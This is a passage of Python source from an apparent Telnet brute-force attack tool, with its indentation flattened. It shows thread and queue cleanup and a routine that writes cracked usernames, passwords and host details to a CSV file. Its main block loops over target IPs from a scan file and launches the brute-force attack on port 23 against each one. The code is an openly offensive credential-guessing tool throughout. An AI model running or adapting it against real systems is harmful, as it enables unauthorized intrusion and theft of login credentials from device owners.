while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful login attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.telnetfile, index=False, mode='a', header=not os.path.exists(self.telnetfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results file.
"""
df = pd.read_csv(self.telnetfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.telnetfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
telnet_bruteforce = TelnetBruteforce(shared_data)
logger.info("Starting Telnet brute-force attack on port 23...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute-force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing TelnetBruteforce on {ip}...")
telnet_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successes: {len(telnet_bruteforce.telnet_connector.results)}")
exit(len(telnet_bruteforce.telnet_connector.results))
except Exception as e:
logger.error(f"Error: {e}")